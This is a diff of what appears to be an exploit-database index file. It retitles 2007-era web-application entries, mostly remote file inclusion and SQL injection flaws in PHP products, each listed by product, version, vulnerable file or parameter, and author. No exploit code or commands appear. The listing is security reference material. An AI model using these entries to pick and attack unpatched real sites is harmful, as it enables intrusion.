Execution",2007-04-11,DarkFig,php,webapps,0 3711,platforms/php/webapps/3711.htm,"CodeBreak 1.1.2 - 'codebreak.php' Remote File Inclusion",2007-04-11,"John Martinelli",php,webapps,0 -3712,platforms/php/webapps/3712.txt,"Mambo Module Weather - 'absolute_path' Parameter Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 +3712,platforms/php/webapps/3712.txt,"Mambo Module Weather - 'absolute_path' Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 3713,platforms/php/webapps/3713.txt,"Mambo Module Calendar (Agenda) 1.5.5 - Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 3714,platforms/php/webapps/3714.txt,"Joomla! Component mosmedia 1.0.8 - Remote File Inclusion",2007-04-11,GoLd_M,php,webapps,0 3716,platforms/php/webapps/3716.pl,"mxBB Module MX Shotcast 1.0 RC2 - 'getinfo1.php' Remote File Inclusion",2007-04-12,bd0rk,php,webapps,0 3717,platforms/php/webapps/3717.txt,"WebKalk2 1.9.0 - 'absolute_path' Remote File Inclusion",2007-04-12,GoLd_M,php,webapps,0 -3718,platforms/php/webapps/3718.txt,"RicarGBooK 1.2.1 - 'lang' Parameter Local File Inclusion",2007-04-12,Dj7xpl,php,webapps,0 +3718,platforms/php/webapps/3718.txt,"RicarGBooK 1.2.1 - 'lang' Local File Inclusion",2007-04-12,Dj7xpl,php,webapps,0 3719,platforms/php/webapps/3719.pl,"MyBulletinBoard (MyBB) 1.2.2 - 'CLIENT-IP' SQL Injection",2007-04-12,Elekt,php,webapps,0 3721,platforms/php/webapps/3721.pl,"e107 0.7.8 - 'mailout.php' Access Escalation Exploit (Admin needed)",2007-04-12,Gammarays,php,webapps,0 3722,platforms/php/webapps/3722.txt,"Expow 0.8 - 'autoindex.php cfg_file' Remote File Inclusion",2007-04-12,mdx,php,webapps,0 @@ -18308,11 +18309,11 @@ id,file,description,date,author,platform,type,port 3739,platforms/php/webapps/3739.php,"Papoo 3.02 - (kontakt menuid) SQL Injection",2007-04-15,Kacper,php,webapps,0 3741,platforms/php/webapps/3741.txt,"CNStats 2.9 - 'who_r.php bj' Remote File Inclusion",2007-04-15,irvian,php,webapps,0 3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 - 'footer.php template' Local File Inclusion",2007-04-15,BeyazKurt,php,webapps,0 -3743,platforms/php/webapps/3743.txt,"Gallery 1.2.5 - (GALLERY_BASEDIR) Multiple Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0 +3743,platforms/php/webapps/3743.txt,"Gallery 1.2.5 - 'GALLERY_BASEDIR' Multiple Remote File Inclusions",2007-04-15,GoLd_M,php,webapps,0 3744,platforms/php/webapps/3744.txt,"audioCMS arash 0.1.4 - (arashlib_dir) Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0 -3745,platforms/php/webapps/3745.txt,"Web Slider 0.6 - 'path' Parameter Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0 +3745,platforms/php/webapps/3745.txt,"Web Slider 0.6 - 'path' Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0 3747,platforms/php/webapps/3747.txt,"openMairie 1.10 - 'scr/soustab.php' Local File Inclusion",2007-04-16,GoLd_M,php,webapps,0 -3748,platforms/php/webapps/3748.txt,"SunShop Shopping Cart 3.5 - 'abs_path' Parameter Remote File Inclusion",2007-04-16,irvian,php,webapps,0 +3748,platforms/php/webapps/3748.txt,"SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion",2007-04-16,irvian,php,webapps,0 3749,platforms/php/webapps/3749.txt,"StoreFront for Gallery - (GALLERY_BASEDIR) Remote File Inclusion",2007-04-16,"Alkomandoz Hacker",php,webapps,0 3750,platforms/php/webapps/3750.txt,"xoops module tsdisplay4xoops 0.1 - Remote File Inclusion",2007-04-16,GoLd_M,php,webapps,0 3751,platforms/php/webapps/3751.txt,"Anthologia 0.5.2 - 'index.php ads_file' Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0 @@ -18330,7 +18331,7 @@ id,file,description,date,author,platform,type,port 3765,platforms/php/webapps/3765.txt,"opensurveypilot 1.2.1 - Remote File Inclusion",2007-04-18,"Alkomandoz Hacker",php,webapps,0 3766,platforms/php/webapps/3766.txt,"Mx Module Smartor Album FAP 2.0 RC 1 - Remote File Inclusion",2007-04-19,bd0rk,php,webapps,0 3767,platforms/asp/webapps/3767.txt,"CreaDirectory 1.2 - 'error.asp id' SQL Injection",2007-04-19,CyberGhost,asp,webapps,0 -3771,platforms/php/webapps/3771.txt,"Supasite 1.23b - Multiple Remote File Inclusion",2007-04-21,GoLd_M,php,webapps,0 +3771,platforms/php/webapps/3771.txt,"Supasite 1.23b - Multiple Remote File Inclusions",2007-04-21,GoLd_M,php,webapps,0 3773,platforms/php/webapps/3773.txt,"JChit counter 1.0.0 - 'imgsrv.php ac' Remote File Disclosure",2007-04-22,Dj7xpl,php,webapps,0 3774,platforms/php/webapps/3774.txt,"PHP-Ring Webring System 0.9 - SQL Injection",2007-04-22,Dj7xpl,php,webapps,0 3775,platforms/php/webapps/3775.txt,"Maran PHP Forum - 'forum_write.php' Remote Code Execution",2007-04-22,Dj7xpl,php,webapps,0 @@ -18339,7 +18340,7 @@ id,file,description,date,author,platform,type,port 3781,platforms/php/webapps/3781.txt,"Joomla! 1.5.0 Beta - 'pcltar.php' Remote File Inclusion",2007-04-23,Omid,php,webapps,0 3783,platforms/php/webapps/3783.txt,"Pagode 0.5.8 - 'navigator_ok.php asolute' Remote File Disclosure",2007-04-23,GoLd_M,php,webapps,0 3785,platforms/php/webapps/3785.txt,"Post REvolution 0.7.0 RC 2 - (dir) Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 -3786,platforms/php/webapps/3786.txt,"GPB Bulletin Board - Multiple Remote File Inclusion",2007-04-24,"ThE TiGeR",php,webapps,0 +3786,platforms/php/webapps/3786.txt,"GPB Bulletin Board - Multiple Remote File Inclusions",2007-04-24,"ThE TiGeR",php,webapps,0 3794,platforms/php/webapps/3794.txt,"USP FOSS Distribution 1.01 - (dnld) Remote File Disclosure",2007-04-24,GoLd_M,php,webapps,0 3795,platforms/php/webapps/3795.txt,"Advanced Webhost Billing System (AWBS) 2.4.0 - 'cart2.php' Remote File Inclusion",2007-04-24,DamaR,php,webapps,0 3796,platforms/php/webapps/3796.htm,"wavewoo 0.1.1 - 'loading.php path_include' Remote File Inclusion",2007-04-24,kezzap66345,php,webapps,0 @@ -18365,9 +18366,9 @@ id,file,description,date,author,platform,type,port 3833,platforms/php/webapps/3833.pl,"mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion",2007-05-02,bd0rk,php,webapps,0 3834,platforms/php/webapps/3834.php,"YaPiG 0.95b - Remote Code Execution",2007-05-02,Dj7xpl,php,webapps,0 3835,platforms/php/webapps/3835.txt,"PostNuke Module v4bJournal - SQL Injection",2007-05-02,"Ali Abbasi",php,webapps,0 -3837,platforms/php/webapps/3837.txt,"phpChess Community Edition 2.0 - Multiple Remote File Inclusion",2007-05-03,GoLd_M,php,webapps,0 +3837,platforms/php/webapps/3837.txt,"phpChess Community Edition 2.0 - Multiple Remote File Inclusions",2007-05-03,GoLd_M,php,webapps,0 3838,platforms/php/webapps/3838.txt,"Open Translation Engine (OTE) 0.7.8 - 'header.php ote_home' Remote File Inclusion",2007-05-03,GoLd_M,php,webapps,0 -3839,platforms/php/webapps/3839.txt,"PHP Coupon Script 3.0 - 'bus' Parameter SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 +3839,platforms/php/webapps/3839.txt,"PHP Coupon Script 3.0 - 'bus' SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3840,platforms/php/webapps/3840.txt,"Pre Classifieds Listings 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3841,platforms/php/webapps/3841.txt,"Pre News Manager 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3842,platforms/php/webapps/3842.txt,"Pre Shopping Mall 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 @@ -18396,7 +18397,7 @@ id,file,description,date,author,platform,type,port 3870,platforms/php/webapps/3870.txt,"LaVague 0.3 - 'printbar.php views_path' Remote File Inclusion",2007-05-08,kezzap66345,php,webapps,0 3874,platforms/php/webapps/3874.txt,"CGX 20050314 - (pathCGX) Remote File Inclusion",2007-05-08,GoLd_M,php,webapps,0 3875,platforms/php/webapps/3875.txt,"PHPLojaFacil 0.1.5 - (path_local) Remote File Inclusion",2007-05-08,GoLd_M,php,webapps,0 -3876,platforms/php/webapps/3876.txt,"GNUEDU 1.3b2 - Multiple Remote File Inclusion",2007-05-08,GoLd_M,php,webapps,0 +3876,platforms/php/webapps/3876.txt,"GNUEDU 1.3b2 - Multiple Remote File Inclusions",2007-05-08,GoLd_M,php,webapps,0 3878,platforms/php/webapps/3878.txt,"Miplex2 - 'SmartyFU.class.php' Remote File Inclusion",2007-05-08,"ThE TiGeR",php,webapps,0 3879,platforms/php/webapps/3879.htm,"phpMyPortal 3.0.0 RC3 - GLOBALS[CHEMINMODULES] Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0 3884,platforms/php/webapps/3884.txt,"aForum 1.32 - (CommonAbsDir) Remote File Inclusion",2007-05-09,"ThE TiGeR",php,webapps,0 @@ -18423,18 +18424,18 @@ id,file,description,date,author,platform,type,port 3920,platforms/php/webapps/3920.txt,"Feindt Computerservice News 2.0 - 'newsadmin.php action' Remote File Inclusion",2007-05-14,Mogatil,php,webapps,0 3923,platforms/php/webapps/3923.txt,"linksnet newsfeed 1.0 - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 3924,platforms/php/webapps/3924.txt,"Media Gallery for Geeklog 1.4.8a - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 -3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 - 'config_atkroot' Parameter Remote File Inclusion",2007-05-15,Katatafish,php,webapps,0 +3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 - 'config_atkroot' Remote File Inclusion",2007-05-15,Katatafish,php,webapps,0 3931,platforms/php/webapps/3931.htm,"XOOPS Module resmanager 1.21 - Blind SQL Injection",2007-05-15,ajann,php,webapps,0 3932,platforms/php/webapps/3932.pl,"XOOPS Module Glossarie 1.7 - 'sid' SQL Injection",2007-05-15,ajann,php,webapps,0 3933,platforms/php/webapps/3933.pl,"XOOPS Module MyConference 1.0 - 'index.php' SQL Injection",2007-05-15,ajann,php,webapps,0 3935,platforms/php/webapps/3935.txt,"Glossword 1.8.1 - 'custom_vars.php' Remote File Inclusion",2007-05-16,BeyazKurt,php,webapps,0 3936,platforms/asp/webapps/3936.txt,"runawaysoft haber portal 1.0 - 'tr' Multiple Vulnerabilities",2007-05-16,kerem125,asp,webapps,0 3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 - (format_menue) Remote File Inclusion",2007-05-16,kezzap66345,php,webapps,0 -3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - 'newnr' Parameter SQL Injection",2007-05-16,Silentz,php,webapps,0 +3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - 'newnr' SQL Injection",2007-05-16,Silentz,php,webapps,0 3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - 'question.php questionref' SQL Injection",2007-05-16,Silentz,php,webapps,0 3944,platforms/php/webapps/3944.txt,"Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0 3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - 'ImageImageMagick.php' Remote File Inclusion",2007-05-17,diesl0w,php,webapps,0 -3947,platforms/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusion",2007-05-17,"Alkomandoz Hacker",php,webapps,0 +3947,platforms/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusions",2007-05-17,"Alkomandoz Hacker",php,webapps,0 3948,platforms/php/webapps/3948.txt,"Libstats 1.0.3 - 'template_csv.php' Remote File Inclusion",2007-05-18,"Mehmet Ince",php,webapps,0 3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 - 'index.php lang' Local File Inclusion",2007-05-18,MurderSkillz,php,webapps,0 3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 - (root) Remote File Inclusion",2007-05-19,"Mehmet Ince",php,webapps,0 @@ -18444,7 +18445,7 @@ id,file,description,date,author,platform,type,port 3958,platforms/php/webapps/3958.php,"Alstrasoft Template Seller Pro 3.25 - Admin Password Change",2007-05-20,BlackHawk,php,webapps,0 3959,platforms/php/webapps/3959.php,"Alstrasoft Template Seller Pro 3.25 - Remote Code Execution",2007-05-20,BlackHawk,php,webapps,0 3960,platforms/php/webapps/3960.php,"WordPress 2.1.3 - 'admin-ajax.php' SQL Injection Blind Fishing Exploit",2007-05-21,waraxe,php,webapps,0 -3962,platforms/php/webapps/3962.txt,"Ol BookMarks Manager 0.7.4 - 'root' Parameter Remote File Inclusion",2007-05-21,"ThE TiGeR",php,webapps,0 +3962,platforms/php/webapps/3962.txt,"Ol BookMarks Manager 0.7.4 - 'root' Remote File Inclusion",2007-05-21,"ThE TiGeR",php,webapps,0 3963,platforms/php/webapps/3963.txt,"TutorialCMS 1.01 - Authentication Bypass",2007-05-21,Silentz,php,webapps,0 3964,platforms/php/webapps/3964.txt,"Ol BookMarks Manager 0.7.4 - SQL Injection",2007-05-21,"Mehmet Ince",php,webapps,0 3970,platforms/php/webapps/3970.txt,"BtiTracker 1.4.1 - (become admin) SQL Injection",2007-05-22,m@ge|ozz,php,webapps,0 @@ -18452,8 +18453,8 @@ id,file,description,date,author,platform,type,port 3972,platforms/php/webapps/3972.txt,"Scallywag - 'template.php path' Remote File Inclusion",2007-05-23,"Mehmet Ince",php,webapps,0 3974,platforms/php/webapps/3974.pl,"Dokeos 1.8.0 - 'my_progress.php course' SQL Injection",2007-05-23,Silentz,php,webapps,0 3980,platforms/php/webapps/3980.pl,"Dokeos 1.6.5 - 'courseLog.php scormcontopen' SQL Injection",2007-05-24,Silentz,php,webapps,0 -3981,platforms/php/webapps/3981.php,"CPCommerce 1.1.0 - 'id_category' Parameter SQL Injection",2007-05-24,Kacper,php,webapps,0 -3983,platforms/php/webapps/3983.txt,"FirmWorX 0.1.2 - Multiple Remote File Inclusion",2007-05-24,DeltahackingTEAM,php,webapps,0 +3981,platforms/php/webapps/3981.php,"CPCommerce 1.1.0 - 'id_category' SQL Injection",2007-05-24,Kacper,php,webapps,0 +3983,platforms/php/webapps/3983.txt,"FirmWorX 0.1.2 - Multiple Remote File Inclusions",2007-05-24,DeltahackingTEAM,php,webapps,0 3987,platforms/php/webapps/3987.txt,"Webavis 0.1.1 - 'class.php root' Remote File Inclusion",2007-05-25,"ThE TiGeR",php,webapps,0 3988,platforms/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution",2007-05-25,Silentz,php,webapps,0 3989,platforms/php/webapps/3989.pl,"My Little Forum 1.7 - 'user.php id' SQL Injection",2007-05-25,Silentz,php,webapps,0 @@ -18530,7 +18531,7 @@ id,file,description,date,author,platform,type,port 4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1 < 2.2 - 'index.php3' Remote File Inclusion",2007-06-26,g00ns,php,webapps,0 4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - 'wp-app.php' Arbitrary File Upload",2007-06-26,"Alexander Concha",php,webapps,0 4114,platforms/php/webapps/4114.txt,"Elkagroup Image Gallery 1.0 - SQL Injection",2007-06-26,t0pP8uZz,php,webapps,0 -4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Parameter Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 +4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 - 'qti_checkname.php' Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 4122,platforms/php/webapps/4122.txt,"b1gbb 2.24.0 - SQL Injection / Cross-Site Scripting",2007-06-28,GoLd_M,php,webapps,0 4124,platforms/php/webapps/4124.txt,"GL-SH Deaf Forum 6.4.4 - Local File Inclusion",2007-06-28,Katatafish,php,webapps,0 @@ -18540,7 +18541,7 @@ id,file,description,date,author,platform,type,port 4129,platforms/php/webapps/4129.txt,"Ripe Website Manager (CMS) 0.8.9 - Remote File Inclusion",2007-06-30,BlackNDoor,php,webapps,0 4130,platforms/php/webapps/4130.txt,"TotalCalendar 2.402 - 'view_event.php' SQL Injection",2007-06-30,t0pP8uZz,php,webapps,0 4131,platforms/php/webapps/4131.txt,"XCMS 1.1 - 'Galerie.php' Local File Inclusion",2007-06-30,BlackNDoor,php,webapps,0 -4132,platforms/php/webapps/4132.txt,"sPHPell 1.01 - Multiple Remote File Inclusion",2007-06-30,"Mehmet Ince",php,webapps,0 +4132,platforms/php/webapps/4132.txt,"sPHPell 1.01 - Multiple Remote File Inclusions",2007-06-30,"Mehmet Ince",php,webapps,0 4133,platforms/php/webapps/4133.txt,"ArcadeBuilder Game Portal Manager 1.7 - SQL Injection",2007-07-01,t0pP8uZz,php,webapps,0 4134,platforms/php/webapps/4134.txt,"Easybe 1-2-3 Music Store - 'process.php' SQL Injection",2007-07-01,t0pP8uZz,php,webapps,0 4135,platforms/php/webapps/4135.pl,"phpEventCalendar 0.2.3 - 'eventdisplay.php' SQL Injection",2007-07-01,Iron,php,webapps,0 @@ -18587,7 +18588,7 @@ id,file,description,date,author,platform,type,port 4199,platforms/php/webapps/4199.txt,"Md-Pro 1.0.8x - (Topics topicid) SQL Injection",2007-07-18,anonymous,php,webapps,0 4201,platforms/php/webapps/4201.txt,"Joomla! Component Pony Gallery 1.5 - SQL Injection",2007-07-19,ajann,php,webapps,0 4206,platforms/php/webapps/4206.txt,"Blog System 1.x - 'index.php news_id' SQL Injection",2007-07-20,t0pP8uZz,php,webapps,0 -4209,platforms/php/webapps/4209.txt,"WSN Links Basic Edition - 'catid' Parameter SQL Injection",2007-07-21,t0pP8uZz,php,webapps,0 +4209,platforms/php/webapps/4209.txt,"WSN Links Basic Edition - 'catid' SQL Injection",2007-07-21,t0pP8uZz,php,webapps,0 4210,platforms/php/webapps/4210.txt,"RGameScript Pro - 'page.php id' Remote File Inclusion",2007-07-21,Warpboy,php,webapps,0 4211,platforms/php/webapps/4211.htm,"JBlog 1.0 - Create / Delete Admin Authentication Bypass",2007-07-21,s4mi,php,webapps,0 4212,platforms/php/webapps/4212.txt,"Joomla! 1.5 Beta 2 - 'Search' Remote Code Execution",2007-07-22,"Johannes Greil",php,webapps,0 @@ -18596,7 +18597,7 @@ id,file,description,date,author,platform,type,port 4220,platforms/php/webapps/4220.pl,"Entertainment CMS - Local File Inclusion / Remote Command Execution",2007-07-24,Kw3[R]Ln,php,webapps,0 4221,platforms/php/webapps/4221.txt,"Article Directory - 'index.php' Remote File Inclusion",2007-07-24,mozi,php,webapps,0 4224,platforms/php/webapps/4224.txt,"Webyapar 2.0 - Multiple SQL Injections",2007-07-25,bypass,php,webapps,0 -4225,platforms/php/webapps/4225.txt,"IndexScript 2.8 - 'cat_id' Parameter SQL Injection",2007-07-25,xssvgamer,php,webapps,0 +4225,platforms/php/webapps/4225.txt,"IndexScript 2.8 - 'cat_id' SQL Injection",2007-07-25,xssvgamer,php,webapps,0 40466,platforms/php/webapps/40466.txt,"Advance MLM Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0 4235,platforms/php/webapps/4235.txt,"Seditio CMS 121 - 'pfs.php' Arbitrary File Upload",2007-07-27,A.D.T,php,webapps,0 4238,platforms/php/webapps/4238.txt,"Adult Directory - 'cat_id' SQL Injection",2007-07-27,t0pP8uZz,php,webapps,0 @@ -18610,10 +18611,10 @@ id,file,description,date,author,platform,type,port 4256,platforms/php/webapps/4256.pl,"Envolution 1.1.0 - (topic) SQL Injection",2007-08-05,k1tk4t,php,webapps,0 4258,platforms/php/webapps/4258.txt,"Lanius CMS 1.2.14 - Multiple SQL Injections",2007-08-06,k1tk4t,php,webapps,0 4261,platforms/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - 'showpage.cgi p' Remote File Disclosure",2007-08-06,GoLd_M,cgi,webapps,0 -4264,platforms/cgi/webapps/4264.txt,"Cartweaver 2.16.11 - 'ProdID' Parameter SQL Injection",2007-08-06,meoconx,cgi,webapps,0 +4264,platforms/cgi/webapps/4264.txt,"Cartweaver 2.16.11 - 'ProdID' SQL Injection",2007-08-06,meoconx,cgi,webapps,0 4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory - 'Directory.php cat' SQL Injection",2007-08-06,t0pP8uZz,php,webapps,0 4267,platforms/php/webapps/4267.txt,"PhpHostBot 1.06 - (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0 -4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - 'format_menue' Parameter Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 +4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - 'format_menue' Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 4269,platforms/php/webapps/4269.txt,"FrontAccounting 1.12 build 31 - Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 4271,platforms/php/webapps/4271.txt,"FishCart 3.2 RC2 - 'fc_example.php' Remote File Inclusion",2007-08-08,k1n9k0ng,php,webapps,0 4273,platforms/php/webapps/4273.txt,"Ncaster 1.7.2 - 'archive.php' Remote File Inclusion",2007-08-09,k1n9k0ng,php,webapps,0 @@ -18628,7 +18629,7 @@ id,file,description,date,author,platform,type,port 4295,platforms/php/webapps/4295.txt,"Squirrelcart 1.x.x - 'cart.php' Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0 4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,php,webapps,0 4300,platforms/php/webapps/4300.txt,"litecommerce 2004 - (category_id) SQL Injection",2007-08-21,k1tk4t,php,webapps,0 -4305,platforms/php/webapps/4305.txt,"Joomla! Component NeoRecruit 1.4 - 'id' Parameter SQL Injection",2007-08-23,ajann,php,webapps,0 +4305,platforms/php/webapps/4305.txt,"Joomla! Component NeoRecruit 1.4 - 'id' SQL Injection",2007-08-23,ajann,php,webapps,0 4306,platforms/php/webapps/4306.txt,"Mambo Component Remository - (cat) SQL Injection",2007-08-23,ajann,php,webapps,0 4307,platforms/php/webapps/4307.txt,"Joomla! Component RSfiles 1.0.2 - (path) File Download",2007-08-23,ajann,php,webapps,0 4308,platforms/php/webapps/4308.txt,"Joomla! Component Nice Talk 0.9.3 - (tagid) SQL Injection",2007-08-23,ajann,php,webapps,0 @@ -18654,7 +18655,7 @@ id,file,description,date,author,platform,type,port 4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - SQL Injection",2007-08-31,Don,php,webapps,0 4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - 'category.php' Blind SQL Injection",2007-08-31,k1tk4t,php,webapps,0 4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - SQL Injection",2007-09-01,Silentz,php,webapps,0 -4352,platforms/php/webapps/4352.txt,"Weblogicnet - (files_dir) Multiple Remote File Inclusion",2007-09-02,bius,php,webapps,0 +4352,platforms/php/webapps/4352.txt,"Weblogicnet - 'files_dir' Multiple Remote File Inclusions",2007-09-02,bius,php,webapps,0 4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - 'error_view.php ID' SQL Injection",2007-09-02,k1tk4t,php,webapps,0 4356,platforms/php/webapps/4356.txt,"eNetman 20050830 - 'index.php' Remote File Inclusion",2007-09-03,JaheeM,php,webapps,0 4358,platforms/php/webapps/4358.txt,"STPHPLibrary - 'STPHPLIB_DIR' Remote File Inclusion",2007-09-03,leetsecurity,php,webapps,0 @@ -18668,20 +18669,20 @@ id,file,description,date,author,platform,type,port 4377,platforms/php/webapps/4377.txt,"Focus/SIS 1.0/2.2 - Remote File Inclusion",2007-09-08,"ThE TiGeR",php,webapps,0 4378,platforms/php/webapps/4378.htm,"Fuzzylime CMS 3.0 - Local File Inclusion",2007-09-08,"not sec group",php,webapps,0 4380,platforms/php/webapps/4380.txt,"Sisfo Kampus 2006 - 'blanko.preview.php' Local File Disclosure",2007-09-08,QTRinux,php,webapps,0 -4381,platforms/php/webapps/4381.txt,"Txx CMS 0.2 - Multiple Remote File Inclusion",2007-09-08,"Nice Name Crew",php,webapps,0 +4381,platforms/php/webapps/4381.txt,"Txx CMS 0.2 - Multiple Remote File Inclusions",2007-09-08,"Nice Name Crew",php,webapps,0 4382,platforms/php/webapps/4382.txt,"PHPress 0.2.0 - 'adisplay.php lang' Local File Inclusion",2007-09-08,"Nice Name Crew",php,webapps,0 4383,platforms/php/webapps/4383.txt,"Joomla! Component Restaurante - Arbitrary File Upload",2007-09-08,"Cold Zero",php,webapps,0 -4384,platforms/php/webapps/4384.txt,"WebED 0.8999a - Multiple Remote File Inclusion",2007-09-08,MhZ91,php,webapps,0 +4384,platforms/php/webapps/4384.txt,"WebED 0.8999a - Multiple Remote File Inclusions",2007-09-08,MhZ91,php,webapps,0 4385,platforms/php/webapps/4385.txt,"AuraCMS 1.5rc - Multiple SQL Injections",2007-09-09,k1tk4t,php,webapps,0 4386,platforms/php/webapps/4386.txt,"Sisfo Kampus 2006 - 'dwoprn.php f' Arbitrary File Download",2007-09-10,k-one,php,webapps,0 -4387,platforms/php/webapps/4387.txt,"phpRealty 0.02 - 'MGR' Parameter Multiple Remote File Inclusion",2007-09-10,QTRinux,php,webapps,0 +4387,platforms/php/webapps/4387.txt,"phpRealty 0.02 - 'MGR' Multiple Remote File Inclusions",2007-09-10,QTRinux,php,webapps,0 4390,platforms/php/webapps/4390.txt,"AuraCMS 2.1 - Remote File Attachment / Local File Inclusion",2007-09-10,k1tk4t,php,webapps,0 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - 'ROOT_PATH' Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0 -4396,platforms/php/webapps/4396.txt,"X-Cart - Multiple Remote File Inclusion",2007-09-11,aLiiF,php,webapps,0 +4396,platforms/php/webapps/4396.txt,"X-Cart - Multiple Remote File Inclusions",2007-09-11,aLiiF,php,webapps,0 4397,platforms/php/webapps/4397.rb,"WordPress 1.5.1.1 < 2.2.2 - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",php,webapps,0 -4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' Parameter SQL Injection",2007-09-13,Houssamix,php,webapps,0 +4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' SQL Injection",2007-09-13,Houssamix,php,webapps,0 4401,platforms/php/webapps/4401.txt,"Joomla! Component Joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps,0 -4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - 'skill_delete' Parameter SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0 +4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - 'skill_delete' SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0 4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b - 'settings.inc.php approot' Remote File Inclusion",2007-09-14,"arfis project",php,webapps,0 4406,platforms/php/webapps/4406.txt,"phpFFL 1.24 - 'PHPFFL_FILE_ROOT' Remote File Inclusion",2007-09-14,Dj7xpl,php,webapps,0 4407,platforms/php/webapps/4407.java,"PHP Webquest 2.5 - (id_actividad) SQL Injection",2007-09-14,D4real_TeaM,php,webapps,0 @@ -18701,7 +18702,7 @@ id,file,description,date,author,platform,type,port 4423,platforms/php/webapps/4423.txt,"modifyform - 'modifyform.html' Remote File Inclusion",2007-09-18,mozi,php,webapps,0 4425,platforms/php/webapps/4425.pl,"phpBB Mod Ktauber.com StylesDemo - Blind SQL Injection",2007-09-18,nexen,php,webapps,0 4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion",2007-09-19,BiNgZa,php,webapps,0 -4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - 'abc' Parameter SQL Injection",2007-09-19,str0ke,php,webapps,0 +4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - 'abc' SQL Injection",2007-09-19,str0ke,php,webapps,0 4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - 'phpbb_root_path' Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0 4435,platforms/php/webapps/4435.pl,"Flip 3.0 - Remote Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0 4436,platforms/php/webapps/4436.pl,"Flip 3.0 - Remote Password Hash Disclosure",2007-09-20,undefined1_,php,webapps,0 @@ -18715,12 +18716,12 @@ id,file,description,date,author,platform,type,port 4447,platforms/php/webapps/4447.txt,"PHP-Nuke addon Nuke Mobile Entartainment 1.0 - Local File Inclusion",2007-09-23,"BorN To K!LL",php,webapps,0 4448,platforms/php/webapps/4448.txt,"helplink 0.1.0 - 'show.php' Remote File Inclusion",2007-09-23,GoLd_M,php,webapps,0 4449,platforms/php/webapps/4449.txt,"phpFullAnnu (PFA) 6.0 - SQL Injection",2007-09-23,IHTeam,php,webapps,0 -4451,platforms/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusion",2007-09-24,BiNgZa,php,webapps,0 +4451,platforms/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusions",2007-09-24,BiNgZa,php,webapps,0 